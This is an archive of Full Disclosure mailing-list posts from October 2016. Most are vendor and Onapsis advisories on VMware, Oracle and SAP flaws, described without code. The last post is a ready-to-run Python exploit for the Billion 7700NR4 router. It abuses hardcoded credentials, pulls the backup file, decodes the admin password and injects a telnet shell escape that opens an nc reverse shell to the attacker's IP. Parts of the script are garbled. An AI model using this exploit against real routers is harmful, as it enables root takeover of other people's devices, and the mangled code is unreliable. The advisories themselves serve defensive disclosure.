date:20161011

[FD] NEW VMSA-2016-0016 - vRealize Operations (vROps) updates address privilege escalation vulnerability

2016-10-11 Thread VMware Security Response Center

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ---
- ---
   VMware Security Advisory
 
Advisory ID: VMSA-2016-0016
Severity:Critical
Synopsis:vRealize Operations (vROps) updates address privilege
escalation
 vulnerability
Issue date:  2016-10-11
Updated on:  2016-10-11 (Initial Advisory)
CVE number:  CVE-2016-7457
 
1. Summary
 
   vRealize Operations (vROps) updates address privilege escalation
   vulnerability.
 
2. Relevant Products
 
   vRealize Operations (vROps)
 
3. Problem Description
 
   vROps privilege escalation issue
 
   vROps contains a privilege escalation vulnerability. Exploitation of
this
   issue may allow a vROps user who has been assigned a low-privileged role
to
   gain full access over the application. In addition it may be possible to
   stop and delete Virtual Machines managed by vCenter.
 
   VMware would like to thank Edgar Carvalho for reporting this issue to
us.
 
   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the identifier CVE-2016-7457 to this issue.
 
   Column 5 of the following table lists the action required to remediate
the
   vulnerability in each release, if a solution is available.
 
   VMwareProductRunningReplace with/
   Product   Versionon   Severity  Apply Patch   Workaround
     =  ===      ==
   vRealize  6.3.0  Any  Critical  patch pending KB2147215
   Operations
   vRealize  6.2.1  Any  Critical  patch pending KB2147247
   Operations
   vRealize  6.2.0a Any  Critical  patch pending KB2147246
   Operations
   vRealize  6.1.0  Any  Critical  patch pending KB2147248
   Operations
   vRealize  6.0.x  Any  N/A   not affected  N/A
   Operations
   vRealize  5.xAny  N/A   not affected  N/A
   Operations
 
4. Solution
 
   Please review the patch/release notes for your product and version and
   verify the checksum of your downloaded file.
 
   vRealize Operations
   Downloads and Documentation:
  
https://my.vmware.com/en/web/vmware/info/slug/infrastructure_operations_man
agement/vmware_vrealize_operations/6_3
 
5. References
 
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7457
   https://kb.vmware.com/kb/2147215
   https://kb.vmware.com/kb/2147247
   https://kb.vmware.com/kb/2147246
   https://kb.vmware.com/kb/2147248
 
- 
 
6. Change log
 
   2016-10-11 VMSA-2016-0016 Initial security advisory in conjunction with
the
   release of vROps patches on 2016-10-11.
 
- 
 
7. Contact
 
   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
 
   This Security Advisory is posted to the following lists:
 
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
 
   E-mail: security at vmware.com
   PGP key at: https://kb.vmware.com/kb/1055
 
   VMware Security Advisories
   http://www.vmware.com/security/advisories
 
   VMware Security Response Policy
   https://www.vmware.com/support/policies/security_response.html
 
   VMware Lifecycle Support Phases
   https://www.vmware.com/support/policies/lifecycle.html
   Twitter
   https://twitter.com/VMwareSRC
 
   Copyright 2016 VMware Inc.  All rights reserved.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8

wj8DBQFX/S0YDEcm8Vbi9kMRAhh7AJ0ctS7c+oxpaQCNvEx+SpVM5fawZACfYvPA
IhRXucua8IjVJBRr8/z45wg=
=JUi8
-END PGP SIGNATURE-


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Onapsis Security Advisory ONAPSIS-2016-057: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-057: Oracle E-Business Suite Cross Site
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-057
- Onapsis SVS ID: ONAPSIS-00260
- CVE: CVE-2016-0533
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page
Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory:
https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vi-0

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the
web listener and the data server.

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute
arbitrary code. This file has a parameter which is not validated and neither
encoded.

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016.

7. Report Timeline
==
- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the
vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.

About Onapsis Research Labs
===
Onapsis Research Labs provides the industry analysis of key security issues
that impact business-critical systems and applications. Delivering frequent and
timely security and compliance advisories with associated risk levels, Onapsis
Research Labs combine in-depth knowledge and experience to deliver technical
and business-context with sound security judgment to the broader information
security community.

About Onapsis, Inc.
===
Onapsis provides the most comprehensive solutions for securing SAP and Oracle
enterprise applications. As the leading experts in SAP and Oracle
cyber-security, Onapsis’ enables security and audit teams to have visibility,
confidence and control of advanced threats, cyber-risks and compliance gaps
affecting their enterprise applications.

Headquartered in Boston, Onapsis serves over 180 Global 2000 customers,
including 10 top retailers, 20 top energy firms and 20 top manufacturers.
Onapsis’ solutions are also the de-facto standard for leading consulting and
audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC.

Onapsis solutions include the Onapsis Security Platform, which is the most
widely-used SAP-certified cyber-security solution in the market. Unlike generic
security products, Onapsis’ context-aware solutions deliver both preventative
vulnerability and compliance controls, as well as real-time detection and
incident response capabilities to reduce risks affecting critical business
processes and data. Through open interfaces, the platform can be integrated
with leading SIEM, GRC and network security products, seamlessly incorporating
enterprise applications into existing vulnerability, risk and incident response
management programs.

These solutions are powered by the Onapsis Research Labs which continuously
provide leading intelligence on security threats affecting SAP and Oracle
enterprise applications. Experts of the Onapsis Research Labs were the first to
lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of
security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP
Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle
E-Business Suite platforms.

For more information, please visit www.onapsis.com, or connect with us on
Twitter, Google+, or LinkedIn.

--
This email and any files transmitted with it are confidential and intended
solely for the use of the individual or entity to whom they are addressed.
If you have received this email in error please notify the system manager.
This message contains confidential information and is intended only for the
individual named. If you are not the named addressee you should not
disseminate, distribute or copy this e-mail.
Please notify the sender immediately by e-mail if you have received this
e-mail by mistake and delete this e-mail from your system. If you are not
the intended recipient you are notified that disclosing, copying,
distributing or taking any action in reliance on

[FD] Onapsis Security Advisory ONAPSIS-2016-056: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-056: Oracle E-Business Suite Cross Site
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-056
- Onapsis SVS ID: ONAPSIS-00269, ONAPSIS-00270, ONAPSIS-00271, ONAPSIS-00272,
ONAPSIS-00273, ONAPSIS-00274 and ONAPSIS-00275
- CVE: CVE-2016-3532
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the
web listener and the data server.

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute
arbitrary code. This file has seven parameters which are not validated and
neither encoded.

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016.

For more information, please visit www.onapsis.com, or connect with us on
Twitter, Google+, or LinkedIn.

[FD] Onapsis Security Advisory ONAPSIS-2016-055: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-055: Oracle E-Business Suite Cross Site
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-055
- Onapsis SVS ID: ONAPSIS-00277, ONAPSIS-00278 and ONAPSIS-00279
- CVE: CVE-2016-3533
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the
web listener and the data server.

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute
arbitrary code. This file has three parameters which are not validated and
neither encoded.

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016.

For more information, please visit www.onapsis.com, or connect with us on
Twitter, Google+, or LinkedIn.

[FD] Onapsis Security Advisory ONAPSIS-2016-053: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-053: Oracle E-Business Suite Cross Site
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-53
- Onapsis SVS ID: ONAPSIS-00281
- CVE: CVE-2016-3535
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the
web listener and the data server.

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute
arbitrary code. This file has a parameter which is not validated and neither
encoded.

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016.

For more information, please visit www.onapsis.com, or connect with us on
Twitter, Google+, or LinkedIn.

[FD] Onapsis Security Advisory ONAPSIS-2016-052: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-052: Oracle E-Business Suite Cross Site
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-052
- Onapsis SVS ID: ONAPSIS-00282 and ONAPSIS-00283
- CVE: CVE-2016-3536
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the
web listener and the data server.

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute
arbitrary code. This file has two parameters which are not validated and
neither encoded.

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016.

For more information, please visit www.onapsis.com, or connect with us on
Twitter, Google+, or LinkedIn.

[FD] Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory
Corruption

1. Impact on Business
=
By exploiting this vulnerability an attacker could hide audit information
logged by the SAP system.

Risk Level: Low

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-051
- Onapsis SVS ID: ONAPSIS-00247
- CVE: CVE-2016-7437
- Researcher: Emiliano J. Fausto
- Vendor Provided CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)
- Onapsis CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SAP NETWEAVER 7.40
- Vulnerability Class: Insufficient Logging (CWE-778)
- Remotely Exploitable: No
- Locally Exploitable: Yes
- Authentication Required: Yes
- Original Advisory:
https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0

4. Affected Components Description
==
The SAP Security Audit Log is used to record security-related system
information such as changes to user master records or unsuccessful logon
attempts. This log is a tool designed for auditors who need to take a detailed
look at what occurs in the SAP System. By activating the audit log, you keep a
record of those activities that you specify for your audit. You can then access
this information for evaluation in the form of an audit analysis report.

5. Vulnerability Details

Even when configuring the parameter rfc/callback_security_method and the SAP
Security Audit Log to consider RFC callbacks events (Accepted/Rejected), both
events DUI/DUJ will be logged in the SAP Security Audit Log as Non-critical.
As the information provided by the SAP Security Audit Log to the security
expert is inaccurate, filtering out non-critical events will also filter
rejected attempts to execute RFC function callbacks.

6. Solution
===
Implement SAP Security Note 2252312.

7. Report Timeline
==
- 11/24/2015: Onapsis provides vulnerability information to SAP AG.
- 01/09/2016: SAP releases SAP Security Note 2252312 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.

For more information, please visit www.onapsis.com, or connect with us on
Twitter, Google+, or LinkedIn.

[FD] Onapsis Security Advisory ONAPSIS-2016-005: SAP SLDREG memory corruption

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-005: SAP SLDREG memory corruption

1. Impact on Business
=
By exploiting this vulnerability, an attacker could potentially abuse of  
technical functions to access and/or compromise the business information.

Risk Level: Low

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-005
- Onapsis SVS ID: ONAPSIS-00161
- CVE: CVE-2016-3638
- Researcher: Nahuel D. Sanchez
- Vendor Provided CVSS v2: 1.5 (AV:L/AC:M/Au:S/C:N/I:N/A:P)
- Onapsis CVSS v2: 2.1 (AV:L/AC:L/Au:N/C:N/I:N/A:P)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SLD Registration Program
- Vulnerability Class: Buffer errors (CWE-119)
- Remotely Exploitable: No
- Locally Exploitable: Yes
- Authentication Required: No
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/sap-sldreg-memory-corruption

4. Affected Components Description
==
The SLDREG tool is used to register SAP Systems in the System Landscape 
Directory. The System Landscape Directory of SAP NetWeaver (SLD) serves as a 
central information repository for the system landscape. 

5. Vulnerability Details

The SLDREG binary is prone to a memory corruption vulnerability, when a 
specially crafted input is passed as HOST parameter.

6. Solution
===
Implement SAP Security Note 2125623.

7. Report Timeline
==
- 01/30/2015: Onapsis provides vulnerability information to SAP AG.
- 02/02/2015: SAP AG confirms reception of vulnerability report.
- 03/10/2015: SAP Reported that the vulnerability is not a security issue
- 04/14/2015: SAP reported fix is In Process.
- 05/12/2015: SAP reported fix is In Process.
- 06/09/2015: SAP reported fix is In Process.
- 07/14/2015: SAP reported fix is In Process.
- 08/11/2015: SAP released SAP Security Note 2125623 fixing the vulnerability.
- 09/22/2016:  Onapsis Releases Security Advisory.


About Onapsis Research Labs
===
Onapsis Research Labs provides the industry analysis of key security issues 
that impact business-critical systems and applications. Delivering frequent and 
timely security and compliance advisories with associated risk levels, Onapsis 
Research Labs combine in-depth knowledge and experience to deliver technical 
and business-context with sound security judgment to the broader information 
security community.

About Onapsis, Inc.
===
Onapsis provides the most comprehensive solutions for securing SAP and Oracle 
enterprise applications. As the leading experts in SAP and Oracle 
cyber-security, Onapsis’ enables security and audit teams to have visibility, 
confidence and control of advanced threats, cyber-risks and compliance gaps 
affecting their enterprise applications.

Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, 
including 10 top retailers, 20 top energy firms and 20 top manufacturers. 
Onapsis’ solutions are also the de-facto standard for leading consulting and 
audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC.

Onapsis solutions include the Onapsis Security Platform, which is the most 
widely-used SAP-certified cyber-security solution in the market. Unlike generic 
security products, Onapsis’ context-aware solutions deliver both preventative 
vulnerability and compliance controls, as well as real-time detection and 
incident response capabilities to reduce risks affecting critical business 
processes and data. Through open interfaces, the platform can be integrated 
with leading SIEM, GRC and network security products, seamlessly incorporating 
enterprise applications into existing vulnerability, risk and incident response 
management programs.

These solutions are powered by the Onapsis Research Labs which continuously 
provide leading intelligence on security threats affecting SAP and Oracle 
enterprise applications. Experts of the Onapsis Research Labs were the first to 
lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of 
security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP 
Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle 
E-Business Suite platforms.

For more information, please visit www.onapsis.com, or connect with us on 
Twitter, Google+, or LinkedIn.



-- 
This email and any files transmitted with it are confidential and intended 
solely for the use of the individual or entity to whom they are addressed. 
If you have received this email in error please notify the system manager. 
This message contains confidential information and is intended only for the 
individual named. If you are not the named addressee you should not 
disseminate, distribute or copy this e-mail.
Please notify the sender immediately by e-mail if you have received this 
e-mail by mistake and delete this

[FD] Onapsis Security Advisory ONAPSIS-2016-050: SAP OS Command Injection in SCTC_REFRESH_CONFIG_CTC

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-050: SAP OS Command Injection in
SCTC_REFRESH_CONFIG_CTC

1. Impact on Business
=
By exploiting this vulnerability an authenticated user will be able to take
full control of the system.

Risk Level: Critical

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-050
- Onapsis SVS ID: ONAPSIS-00252
- CVE: CVE-2016-7435
- Researcher: Pablo Artuso
- Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H)
- Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SAP Netweaver 7.40 SP 12
- Vulnerability Class: Improper Neutralization of Special Elements used in an
OS Command (CWE-78)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory:
https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshconfigctc

4. Affected Components Description
==
SAP NetWeaver is the SAP technological integration platform, on top of which,
enterprise and business solutions are developed and run.
In particular, SCTC is a subpackage of SAP_BASIS which holds technical
configurations.

5. Vulnerability Details

The SCTC_REFRESH_CONFIG_CTC function doesn't correctly sanitize variables used
when executing CALL 'SYSTEM' statement, allowing an attacker, with particular
privileges, to execute any arbitrary OS command.

6. Solution
===
Implement SAP Security Note 2260344.

7. Report Timeline
==
- 11/26/2015: Onapsis provides vulnerability information to SAP AG.
- 11/27/2015: SAP AG confirms reception of vulnerability report.
- 01/12/2016: SAP reports fix is In Process.
- 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.

For more information, please visit www.onapsis.com, or connect with us on
Twitter, Google+, or LinkedIn.

[FD] Onapsis Security Advisory ONAPSIS-2016-049: SAP OS Command Injection in SCTC_REORG_SPOOL

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-049: SAP OS Command Injection in
SCTC_REORG_SPOOL

1. Impact on Business
=
By exploiting this vulnerability an authenticated user will be able to take
full control of the system.

Risk Level: Critical

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-049
- Onapsis SVS ID: ONAPSIS-00255
- CVE: CVE-2016-7435
- Researcher: Pablo Artuso
- Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H)
- Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

3. Vulnerability Information

5. Vulnerability Details

The SCTC_REORG_SPOOL function doesn't correctly sanitize variables used when
executing CALL 'SYSTEM' statement, allowing an attacker, with particular
privileges, to execute any arbitrary OS command.

6. Solution
===
Implement SAP Security Note 2260344.

For more information, please visit www.onapsis.com, or connect with us on
Twitter, Google+, or LinkedIn.

[FD] Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass

2016-10-11 Thread Onapsis Research

Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass

1. Impact on Business
=
By exploiting this vulnerability, an attacker could bypass protections 
implemented in the SAP systems, potentially executing arbitrary business 
processes.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-002
- Onapsis SVS ID: ONAPSIS-00165
- CVE: CVE-2016-3635
- Researcher: Sergio Abraham and Pablo Müller
- Vendor Provided CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
- Onapsis CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SAP Netweaver 7.4
- Vulnerability Class: Improper Access Control (CWE-284)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass

4. Affected Components Description
==
In SAP, the Remote Function Modules (RFM) are used to execute remote functions 
in external systems, where the access control can be enforced by a list that is 
managed through the Unified Connectivity (UCON) framework.

5. Vulnerability Details

An authenticated user could execute Remote Function Modules (RFM) which are 
filtered by the Unified Connectivity (UCON) access control list. Those RFMs are 
in the final phase of UCON implementation and not included in a Communication 
Assembly (CA). That means that no user (regardless its privileges) should be 
able to execute those RFMs.

The user needs to remotely execute an anonymous RFM included in a Communication 
Assembly (enabled by UCON), and by leveraging the same connection execute a 
second RFM which is filtered (not included in a Communication Assembly).
As result, the user will be able to execute a RFM that was originally filtered 
by UCON, completely bypassing the access control list.

6. Solution
===
Implement SAP Security Note 2139366. 

7. Report Timeline
==
- 03/03/2015: Onapsis provides vulnerability information to SAP AG.
- 05/03/2015: SAP AG confirms reception of vulnerability report.
- 10/03/2015: SAP reported fix is In Process.
- 14/04/2015: SAP reported fix is In Process.
- 12/05/2015: SAP reported fix is In Process.
- 09/06/2015: SAP reported fix is In Process.
- 09/06/2015: SAP released SAP Security Note 2139366 fixing the vulnerability
- 09/22/2016: Onapsis Releases Security Advisory.



About Onapsis Research Labs
===
Onapsis Research Labs provides the industry analysis of key security issues 
that impact business-critical systems and applications. Delivering frequent and 
timely security and compliance advisories with associated risk levels, Onapsis 
Research Labs combine in-depth knowledge and experience to deliver technical 
and business-context with sound security judgment to the broader information 
security community.

About Onapsis, Inc.
===
Onapsis provides the most comprehensive solutions for securing SAP and Oracle 
enterprise applications. As the leading experts in SAP and Oracle 
cyber-security, Onapsis’ enables security and audit teams to have visibility, 
confidence and control of advanced threats, cyber-risks and compliance gaps 
affecting their enterprise applications.

Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, 
including 10 top retailers, 20 top energy firms and 20 top manufacturers. 
Onapsis’ solutions are also the de-facto standard for leading consulting and 
audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC.

Onapsis solutions include the Onapsis Security Platform, which is the most 
widely-used SAP-certified cyber-security solution in the market. Unlike generic 
security products, Onapsis’ context-aware solutions deliver both preventative 
vulnerability and compliance controls, as well as real-time detection and 
incident response capabilities to reduce risks affecting critical business 
processes and data. Through open interfaces, the platform can be integrated 
with leading SIEM, GRC and network security products, seamlessly incorporating 
enterprise applications into existing vulnerability, risk and incident response 
management programs.

These solutions are powered by the Onapsis Research Labs which continuously 
provide leading intelligence on security threats affecting SAP and Oracle 
enterprise applications. Experts of the Onapsis Research Labs were the first to 
lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of 
security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP 
Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle 
E-Business Suite platforms.

For more information, please visit www.onapsis.com, or connect with us on

Re: [FD] Critical Vulnerability in Ubiquiti UniFi

2016-10-11 Thread Rob Thomas

The impression I get from Tim Pham's emails is that the 'Unify Manager' is 
doing some behind-the-scenes tunnelling, and bringing the Mongo interface from 
the server to the client (Eg, Mac or Windows device) and you are then able to 
connect to localhost (on the client) which tunnels through to the server.

However, after much searching, I am unable to locate this application. Googling 
insinuates that it is this (unreleased) software - 
https://www.ubnt.com/enterprise/software/

--Rob Thomas
Information Security, Sangoma Corporation


-Original Message-
From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of 
Gregory Sloop
Sent: Wednesday, 5 October 2016 1:54 AM
To: Tim Schughart ; 
fulldisclosure@seclists.org; bugt...@securityfocus.com; 
webapp...@securityfocus.com
Cc: Khanh Quoc. Pham 
Subject: Re: [FD] Critical Vulnerability in Ubiquiti UniFi

I attempted private contact with Tim Pham and via email 12+ hours ago, but 
received no response since then.

I've spent some time trying to reproduce the reported vulnerability and have 
had no success. It certainly doesn't help that the steps to reproduce it are so 
poorly described or documented.
Without better documentation of the exploit, it seems impossible to determine 
if the report is just mis-informed, blatantly false, or if perhaps there's some 
step/process I don't understand or am missing.

In every attempt I've made the binding of MongoBD to 127.0.0.1 is effective and 
non-local connection attempts are refused, as one would expect.
A swift response from Prosec Networks [prosec-networks.com] would be most 
helpful.

___
Sent through the Full Disclosure mailing list 
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Billion Router 7700NR4 Remote Root Command Execution

2016-10-11 Thread Rio Sherri

# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is a widely used here in Albania. It is given by a telecom
provider to the home and bussiness users.
# The problem is that this router has hardcoded credentials which "can not
be changed" by a normal user. Using these
# credentials we don't have to much access but the lack of authentication
security we can download the backup and get the admin password.
# Using that password we can login to telnet server and use a shell escape
to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking
ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the
credentials and disabling all the other services using iptables.
# Exploit attached.

# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4 
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these 
# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. 
#

import requests
import base64
import socket
import time

host = ""
def_user = "user"
def_pass = "user"
reverse_ip = ""
#Banner
banner = ""
banner +="  _____ __  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner


# limited shell escape
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip  + ' 1337 0backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'

def execute_payload(password):
	print "[+] Please run nc -lvp 1337 and then press any key [+]"
	raw_input()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,23))
	s.recv(1024)
	s.send("admin\r")
	a= s.recv(1024)
	time.sleep(1)
	s.send(password +"\r")
	time.sleep(1)
	s.recv(1024)
	s.send(evil + "\r")
	time.sleep(1)
	print "[+] If everything worked you should get a reverse shell [+]"
	print "[+] Warning pressing any key will close the SHELL [+]"
	raw_input()




r = requests.get("http://; + host + "/backupsettings.conf" , auth=(def_user,def_pass))
if(r.status_code == 200):
	print "[+] Seems the exploit worked [+]"
	print "[+] Dumping data . . . [+]"
	temp = r.text
	admin_pass = temp.split("")[1].split("")[0]
#	print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
	execute_payload(str(base64.b64decode(admin_pass)))
else:
	print "[-] Exploit Failed [-]"
print "\n[+] https://www.infogen.al/ [+]\n\n"

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

